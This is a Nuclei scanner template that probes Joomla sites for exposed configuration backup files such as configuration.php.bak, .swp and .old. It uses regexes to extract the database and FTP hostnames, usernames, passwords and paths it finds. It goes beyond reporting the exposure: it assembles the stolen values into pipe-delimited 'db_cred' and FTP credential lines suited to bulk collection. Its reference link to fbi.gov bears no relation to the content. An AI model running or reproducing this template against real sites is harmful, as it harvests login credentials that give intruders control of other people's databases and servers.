id: joom-cnf

info:
  name: joomla-sensitive-leak-config
  author: nucleixivanovich
  severity: critical
  reference: https://fbi.gov/
  
http:
  - method: GET
    path:
      - '{{BaseURL}}/configuration.php'
      - '{{BaseURL}}/configuration.php~'
      - '{{BaseURL}}/configuration.php.new'
      - '{{BaseURL}}/configuration.php.new~'
      - '{{BaseURL}}/configuration.php.old'
      - '{{BaseURL}}/configuration.php.old~'
      - '{{BaseURL}}/configuration.bak'
      - '{{BaseURL}}/configuration.php.bak'
      - '{{BaseURL}}/configuration.php.bkp'
      - '{{BaseURL}}/configuration.txt'
      - '{{BaseURL}}/configuration.php.txt'
      - '{{BaseURL}}/configuration - Copy.php'
      - '{{BaseURL}}/configuration.php.swo'
      - '{{BaseURL}}/configuration.php_bak'
      - '{{BaseURL}}/configuration.orig'
      - '{{BaseURL}}/configuration.php.save'
      - '{{BaseURL}}/configuration.php.original'
      - '{{BaseURL}}/configuration.php.swp'
      - '{{BaseURL}}/configuration.save'
      - '{{BaseURL}}/.configuration.php.swp'
      - '{{BaseURL}}/configuration.php1'
      - '{{BaseURL}}/configuration.php2'
      - '{{BaseURL}}/configuration.php3'
      - '{{BaseURL}}/configuration.php4'
      - '{{BaseURL}}/configuration.php4'
      - '{{BaseURL}}/configuration.php6'
      - '{{BaseURL}}/configuration.php7'
      - '{{BaseURL}}/configuration.phtml'
      - '{{BaseURL}}/configuration.php-dist'

    stop-at-first-match: true
    matchers-condition: or
    matchers:

      - type: dsl
        dsl:
          - contains(body,'JConfig')          
          - contains(body,'$password')
          - status_code==200
        condition: and

      - type: dsl
        dsl: 
          - contains(body,'JConfig')          
          - contains(body,'ftp_user')
          - contains(body,'ftp_pass')
          - status_code==200
        condition: and

    extractors:
    #===DB===#
      - type: regex
        name: host
        internal: true 
        group: 1       
        regex:
          - "(?mi)\\$host\\s*[=:]\\s*\\'(.*?)\\'"

      - type: regex
        name: user
        internal: true 
        group: 1               
        regex:
          - "(?mi)\\$user\\s*[=:]\\s*\\'(.*?)\\'"

      - type: regex
        name: pass
        internal: true  
        group: 1              
        regex:
          - "(?mi)\\$password\\s*[=:]\\s*\\'(.*?)\\'"

      - type: regex
        name: type
        internal: true
        group: 1        
        regex:
          - "(?mi)\\$dbtype\\s*[=:]\\s*\\'(.*?)\\'"

    #===FTP===#
      - type: regex
        name: ftp_host
        internal: true 
        group: 1       
        regex:
          - "(?mi)\\$ftp_host\\s*[=:]\\s*\\'(.*?)\\'"

      - type: regex
        name: ftp_port
        internal: true 
        group: 1               
        regex:
          - "(?mi)\\$ftp_port\\s*[=:]\\s*\\'(.*?)\\'"          

      - type: regex
        name: ftp_user
        internal: true 
        group: 1               
        regex:
          - "(?mi)\\$ftp_user\\s*[=:]\\s*\\'(.*?)\\'"

      - type: regex
        name: ftp_pass
        internal: true  
        group: 1              
        regex:
          - "(?mi)\\$ftp_pass\\s*[=:]\\s*\\'(.*?)\\'"

      - type: regex
        name: ftp_root
        internal: true
        group: 1        
        regex:
          - "(?mi)\\$ftp_root\\s*[=:]\\s*\\'(.*?)\\'"

    #===MAKE-LINES===#           

      - type: dsl
        name: joom_db
        dsl:
          - '"db_cred: " + host + "|" + "3306" + "|" + user + "|" + pass '

#      - type: dsl
#        name: ftp_enable
#        dsl:
#          - 'ftp_host + "|" + ftp_port + "|" + ftp_user + "|" + ftp_pass '

      - type: dsl
        name: joom_ftp
        dsl:
          - 'ftp_host + "|" + ftp_port + "|" + ftp_user + "|" + ftp_pass + "|" + ftp_root '